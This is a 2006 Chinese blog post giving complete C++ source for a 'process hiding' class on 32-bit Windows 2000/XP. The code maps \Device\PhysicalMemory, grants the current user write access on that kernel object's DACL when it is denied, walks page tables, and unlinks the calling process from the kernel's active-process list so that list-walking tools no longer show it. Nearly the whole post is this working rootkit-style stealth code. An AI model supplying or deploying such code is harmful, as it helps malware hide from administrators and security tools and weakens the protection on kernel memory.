进程隐藏类

原创 2006年06月23日 17:13:00

1. 头文件（HideProcss.h）如下：

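// Hides the calling process by patching kernel memory from user mode through
// the \Device\PhysicalMemory section (see HideProcss.cpp).  Everything about
// the technique is version-specific: OpenPhysicalMemory() only accepts
// Windows 2000 (5.0) and XP (5.1), and the page-table walk assumes 32-bit,
// non-PAE paging.  All working state lives in file-scope globals in the .cpp,
// so instances of this class carry no state of their own.
class CHideProcss 
{
public:
 CHideProcss();
 // Public entry point; runs the hide procedure at most once per process.
 BOOL HideProcess();
 virtual ~CHideProcss();
private:
 // Loads ntdll.dll and resolves RtlInitUnicodeString / ZwOpenSection.
 BOOL InitNTDLL();
 // Does the actual work; HideProcess() is a one-shot latch around it.
 BOOL YHideProcess();
 VOID CloseNTDLL();
 // Grants the current user SECTION_MAP_WRITE on the section's DACL; used
 // when the first open of \Device\PhysicalMemory is denied.
 VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
 // Opens \Device\PhysicalMemory and maps the page directory page.
 HANDLE OpenPhysicalMemory();
 // Walks the 32-bit page tables to turn a virtual address into a physical one.
 PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);
 // Read / write one ULONG at a kernel virtual address via physical memory.
 ULONG GetData(PVOID addr);
 BOOL SetData(PVOID addr,ULONG data);
 // Top-level exception filter.  Declared static so it is convertible to
 // LPTOP_LEVEL_EXCEPTION_FILTER; as a non-static member it could not be
 // passed to SetUnhandledExceptionFilter (the call in YHideProcess() is
 // commented out).
 static long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);

};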

2. 源文件（HideProcss.cpp）如下：

// HideProcss.cpp: implementation of the CHideProcss class.
// 进程隐藏程序：通过打开 \Device\PhysicalMemory 直接改写内核内存，把本进程从内核的进程链表中摘除。
// 只支持 32 位 Windows 2000 / XP（代码按系统版本硬编码了页目录物理地址和结构偏移），
// 并且需要能够打开该对象或修改其 DACL 的权限，通常即管理员权限。
// 要隐藏时调用 HideProcess 即可
//////////////////////////////////////////////////////////////////////

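// Includes: the published listing shows these as "#i nclude" (a rendering
// artefact); the directives below are the compilable form.
#include "stdafx.h"
#include "HideProcss.h"
#include <windows.h>
#include <Accctrl.h>   // EXPLICIT_ACCESS / TRUSTEE for the DACL helper
#include <Aclapi.h>    // GetSecurityInfo / SetEntriesInAcl / SetSecurityInfo

// MFC debug-heap boilerplate (generated by the class wizard).
#ifdef _DEBUG
#undef THIS_FILE
static char THIS_FILE[]=__FILE__;
#define new DEBUG_NEW
#endif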

// Minimal native-API definitions so this file does not need the DDK headers.
// NT_SUCCESS mirrors the kernel macro: any non-negative NTSTATUS is success.
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)   // unused in this file
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)          // checked after ZwOpenSection

typedef LONG NTSTATUS;

// Declared for completeness; nothing in this file uses it.
typedef struct _IO_STATUS_BLOCK
{
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

// Counted UTF-16 string used for NT object names.
typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// OBJ_* flags for OBJECT_ATTRIBUTES.Attributes (this file passes 0).
#define OBJ_INHERIT                0x00000002L
#define OBJ_PERMANENT              0x00000010L
#define OBJ_EXCLUSIVE              0x00000020L
#define OBJ_CASE_INSENSITIVE       0x00000040L
#define OBJ_OPENIF                 0x00000080L
#define OBJ_OPENLINK               0x00000100L
#define OBJ_KERNEL_HANDLE          0x00000200L
#define OBJ_VALID_ATTRIBUTES       0x000003F2L

// Describes the object to open; only Length and ObjectName are set here.
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

// ZwOpenSection(SectionHandle, DesiredAccess, ObjectAttributes), resolved
// from ntdll.dll at run time by InitNTDLL().
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );

// RtlInitUnicodeString(DestinationString, SourceString), also resolved at run time.
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );

// File-scope state shared by the CHideProcss methods (zero-initialized).
RTLINITUNICODESTRING RtlInitUnicodeString;   // set by InitNTDLL()
ZWOPENSECTION ZwOpenSection;                 // set by InitNTDLL()
HMODULE       g_hNtDLL = NULL;               // ntdll.dll handle from LoadLibrary
PVOID         g_pMapPhysicalMemory = NULL;   // view of the page-directory page (OpenPhysicalMemory)
HANDLE        g_hMPM = NULL;                 // \Device\PhysicalMemory section handle
OSVERSIONINFO g_osvi;                        // filled by OpenPhysicalMemory(), read by YHideProcess()
//---------------------------------------------------------------------------
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////

CHideProcss::CHideProcss()
{
    // Nothing to initialize: all working state lives in the file-scope globals.
}

CHideProcss::~CHideProcss()
{
    // Nothing to release: handles are closed inside YHideProcess() itself.
}

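// Loads ntdll.dll and resolves the two native functions this file needs.
// Returns FALSE, with nothing left loaded and both pointers NULL, if the
// module or either export cannot be found.  The original returned TRUE
// unconditionally, so a missing export would only surface as a NULL call
// later in OpenPhysicalMemory().
BOOL CHideProcss::InitNTDLL()
{
    g_hNtDLL = LoadLibrary("ntdll.dll");
    if (NULL == g_hNtDLL)
        return FALSE;

    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");
    ZwOpenSection        = (ZWOPENSECTION)GetProcAddress(g_hNtDLL, "ZwOpenSection");

    if (NULL == RtlInitUnicodeString || NULL == ZwOpenSection)
    {
        FreeLibrary(g_hNtDLL);
        g_hNtDLL = NULL;
        RtlInitUnicodeString = NULL;
        ZwOpenSection = NULL;
        return FALSE;
    }

    return TRUE;
}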
//---------------------------------------------------------------------------
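// Releases the ntdll.dll reference taken by InitNTDLL() and clears the
// function pointers resolved from it, so nothing can call through a
// pointer whose module reference has been dropped.  Safe to call twice.
VOID CHideProcss::CloseNTDLL()
{
    if (NULL != g_hNtDLL)
        FreeLibrary(g_hNtDLL);

    g_hNtDLL = NULL;
    RtlInitUnicodeString = NULL;
    ZwOpenSection = NULL;
}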
//---------------------------------------------------------------------------
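// Adds an ACE granting the current user SECTION_MAP_WRITE on hSection.  Used
// by OpenPhysicalMemory() when the first open of \Device\PhysicalMemory is
// denied; the caller must have opened hSection with READ_CONTROL|WRITE_DAC.
//
// The signature is VOID (fixed by the header), so failure is only visible
// through the caller's retry of ZwOpenSection() failing again.  The original
// never returned early on error (it fell through and used a NULL DACL) and
// never freed the security descriptor or the new DACL on the success path.
//
// Reviewer note: this widens the DACL of a kernel object and nothing in this
// file ever restores the previous DACL.
VOID CHideProcss::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl = NULL;
    PACL pNewDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;

    if (NULL == hSection)
        return;

    // pDacl points into pSD; only pSD is freed, with LocalFree as the
    // GetSecurityInfo contract requires.
    DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                                  NULL, NULL, &pDacl, NULL, &pSD);
    if (ERROR_SUCCESS != dwRes)
        return;

    EXPLICIT_ACCESS ea;
    RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode        = GRANT_ACCESS;
    ea.grfInheritance       = NO_INHERITANCE;
    ea.Trustee.TrusteeForm  = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType  = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName    = "CURRENT_USER";   // well-known trustee name for the caller's account

    // Merge the new ACE into a copy of the existing DACL.
    dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
    if (ERROR_SUCCESS == dwRes)
    {
        SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                        NULL, NULL, pNewDacl, NULL);
    }

    if (NULL != pNewDacl)
        LocalFree(pNewDacl);
    if (NULL != pSD)
        LocalFree(pSD);
}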
//---------------------------------------------------------------------------
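// Opens the \Device\PhysicalMemory section and maps the page holding the
// kernel page directory.  On success the view is in g_pMapPhysicalMemory,
// the section handle in g_hMPM, and g_hMPM is returned.  On failure NULL is
// returned and g_hMPM is left NULL, so there is no handle for the caller to
// leak.  InitNTDLL() must have succeeded first.
//
// Only Windows 2000 (5.0) and XP (5.1) are accepted: the physical address of
// the page directory is hard-coded per version and LinearToPhys() assumes
// 32-bit, non-PAE page tables.  On a kernel whose page directory lives
// elsewhere (other service pack, boot options) the reads may return garbage.
HANDLE CHideProcss::OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory;

    if (NULL == RtlInitUnicodeString || NULL == ZwOpenSection)
        return NULL;

    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    if (!GetVersionEx(&g_osvi))
        return NULL;

    if (5 != g_osvi.dwMajorVersion)
        return NULL;

    switch (g_osvi.dwMinorVersion)
    {
    case 0:
        PhyDirectory = 0x30000;   // Windows 2000
        break;
    case 1:
        PhyDirectory = 0x39000;   // Windows XP
        break;
    default:
        return NULL;
    }

    // NT object-manager paths use backslashes; the forward-slash spelling in
    // the published listing ("//Device//PhysicalMemory") does not name the
    // section and the open would simply fail.
    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

    attributes.Length                   = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory            = NULL;
    attributes.ObjectName               = &physmemString;
    attributes.Attributes               = 0;
    attributes.SecurityDescriptor       = NULL;
    attributes.SecurityQualityOfService = NULL;

    g_hMPM = NULL;
    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);

    if (STATUS_ACCESS_DENIED == status)
    {
        // Widen the section's DACL and retry.  The original ignored the
        // result of this second open and passed whatever was in g_hMPM to
        // the DACL helper and CloseHandle().
        HANDLE hDacl = NULL;
        status = ZwOpenSection(&hDacl, READ_CONTROL | WRITE_DAC, &attributes);
        if (!NT_SUCCESS(status))
            return NULL;

        SetPhyscialMemorySectionCanBeWrited(hDacl);
        CloseHandle(hDacl);

        g_hMPM = NULL;
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
    }

    if (!NT_SUCCESS(status))
    {
        g_hMPM = NULL;
        return NULL;
    }

    // One page at the page directory's physical address; LinearToPhys()
    // indexes it as 1024 page-directory entries.
    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE,
                                         0, PhyDirectory, 0x1000);
    if (NULL == g_pMapPhysicalMemory)
    {
        CloseHandle(g_hMPM);   // the original leaked the handle here
        g_hMPM = NULL;
        return NULL;
    }

    return g_hMPM;
}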
//---------------------------------------------------------------------------
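// Translates a virtual address to a physical address by walking 32-bit,
// non-PAE page tables.  BaseAddress is the mapped page directory (1024
// PDEs); for 4 KB mappings the page table is read through a temporary view
// of g_hMPM.  Returns 0 when the PDE or PTE is not present or when the page
// table cannot be mapped — the original dereferenced a NULL view in that
// case and leaked the view when the PTE was not present.  Note that 0 is
// also a valid physical address; callers treat it as failure.
PVOID CHideProcss::LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    const ULONG VAddr = (ULONG)addr;
    ULONG PAddr;

    if (NULL == BaseAddress)
        return 0;

    // Bits 31..22 index the page directory.
    const ULONG PGDE = BaseAddress[VAddr >> 22];
    if (0 == (PGDE & 1))            // P bit clear: not present
        return 0;

    if (0 != (PGDE & 0x00000080))   // PS bit: 4 MB page, no page-table level
    {
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
        return (PVOID)PAddr;
    }

    // Map the page table this PDE points at and select the PTE for bits 21..12.
    PULONG pageTable = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0,
                                             PGDE & 0xFFFFF000, 0x1000);
    if (NULL == pageTable)
        return 0;

    const ULONG PTE = pageTable[(VAddr & 0x003FF000) >> 12];
    UnmapViewOfFile(pageTable);

    if (0 == (PTE & 1))
        return 0;

    PAddr = (PTE & 0xFFFFF000) + (VAddr & 0x00000FFF);
    return (PVOID)PAddr;
}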
//---------------------------------------------------------------------------
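// Reads the ULONG at kernel virtual address addr via physical memory.
// Returns 0 when the address does not translate or the page cannot be
// viewed, so callers must treat 0 as "failed" rather than as data.  The
// original did not check the translation and, on failure, mapped physical
// page 0 and returned whatever it found there.
ULONG CHideProcss::GetData(PVOID addr)
{
    const ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (0 == phys)
        return 0;

    // A read-only view suffices for a read.
    PULONG page = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0,
                                        phys & 0xFFFFF000, 0x1000);
    if (NULL == page)
        return 0;

    const ULONG value = page[(phys & 0xFFF) >> 2];
    UnmapViewOfFile(page);
    return value;
}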
//---------------------------------------------------------------------------
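// Writes data to kernel virtual address addr via physical memory.  Returns
// FALSE when the address does not translate or the page cannot be mapped
// for writing.  The original skipped the translation check and would write
// into physical page 0 on a failed lookup.
BOOL CHideProcss::SetData(PVOID addr, ULONG data)
{
    const ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (0 == phys)
        return FALSE;

    PULONG page = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0,
                                        phys & 0xFFFFF000, 0x1000);
    if (NULL == page)
        return FALSE;

    page[(phys & 0xFFF) >> 2] = data;
    UnmapViewOfFile(page);
    return TRUE;
}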
//---------------------------------------------------------------------------
// Top-level exception filter: terminates the process with exit code 0 on any
// unhandled exception (presumably to avoid the crash dialog).  The install
// call in YHideProcess() is commented out, so this is never registered.
long __stdcall CHideProcss::exeception(struct _EXCEPTION_POINTERS *tmp)
{
    (void)tmp;
    ExitProcess(0);
    return EXCEPTION_EXECUTE_HANDLER;   // not reached; ExitProcess does not return
}
//---------------------------------------------------------------------------
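// Unlinks this process's kernel process object from the kernel's process
// list by patching physical memory:
//   1. read the current thread object ("kteb" in the original) from the
//      fixed address 0xFFDFF124,
//   2. read its process object ("kpeb") from thread+0x44,
//   3. read the list entry's Flink/Blink at a per-version process offset
//      (0xa0 on 2000, 0x88 on XP; presumably EPROCESS.ActiveProcessLinks),
//   4. splice the two neighbours together and point our own entry at itself.
// The addresses and offsets are hard-coded for 32-bit Windows 2000/XP and
// come from the original author; nothing here validates them beyond "not 0".
//
// Changes from the original: every kernel read is checked (a 0 result aborts
// instead of being used as a pointer), fw/bw are initialised, the view of the
// page directory is unmapped, the handle is cleared after CloseHandle, and
// our own entry is self-linked so that the kernel's own unlink at process
// exit writes only into our entry rather than into the former neighbours,
// which may have been freed by then.
//
// Limits worth knowing: this only affects enumeration that walks the list;
// anything that finds processes another way (handle tables, scheduler
// lists, the PID table) still sees it.
BOOL CHideProcss::YHideProcess()
{
//    SetUnhandledExceptionFilter(exeception);

    if (FALSE == InitNTDLL())
        return FALSE;

    if (NULL == OpenPhysicalMemory())
    {
        CloseNTDLL();
        return FALSE;
    }

    ULONG linksOffset = 0;
    if (0 == g_osvi.dwMinorVersion)
        linksOffset = 0xa0;   // Windows 2000
    else if (1 == g_osvi.dwMinorVersion)
        linksOffset = 0x88;   // Windows XP

    BOOL  ok      = FALSE;
    ULONG thread  = 0;
    ULONG process = 0;

    if (0 != linksOffset)
    {
        thread = GetData((PVOID)0xFFDFF124);           // current thread object
        if (0 != thread)
            process = GetData((PVOID)(thread + 0x44)); // owning process object
    }

    if (0 != process)
    {
        const ULONG entry = process + linksOffset;     // address of the LIST_ENTRY
        const ULONG fw = GetData((PVOID)entry);        // Flink
        const ULONG bw = GetData((PVOID)(entry + 4));  // Blink

        if (0 != fw && 0 != bw)
        {
            // Standard LIST_ENTRY removal: Flink->Blink = Blink; Blink->Flink = Flink.
            ok = SetData((PVOID)(fw + 4), bw) && SetData((PVOID)bw, fw);

            // Make our entry point at itself so a later RemoveEntryList on it
            // is a no-op instead of a write into stale neighbour pointers.
            if (ok)
                ok = SetData((PVOID)entry, entry) && SetData((PVOID)(entry + 4), entry);
        }
    }

    if (NULL != g_pMapPhysicalMemory)
    {
        UnmapViewOfFile(g_pMapPhysicalMemory);
        g_pMapPhysicalMemory = NULL;
    }
    if (NULL != g_hMPM)
    {
        CloseHandle(g_hMPM);
        g_hMPM = NULL;
    }
    CloseNTDLL();

    return ok;
}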

// 隐藏进程的显示
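// Public entry point.  Runs the hide procedure at most once per process and
// returns whether that one attempt succeeded; later calls return the cached
// result instead of retrying (a retry after a partial kernel write could
// splice the list a second time).  The original always returned TRUE, so a
// caller could not tell that nothing had happened.
BOOL CHideProcss::HideProcess()
{
    static BOOL s_attempted = FALSE;
    static BOOL s_result    = FALSE;

    if (!s_attempted)
    {
        s_attempted = TRUE;   // latch before the call, as the original did
        s_result    = YHideProcess();
    }

    return s_result;
}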
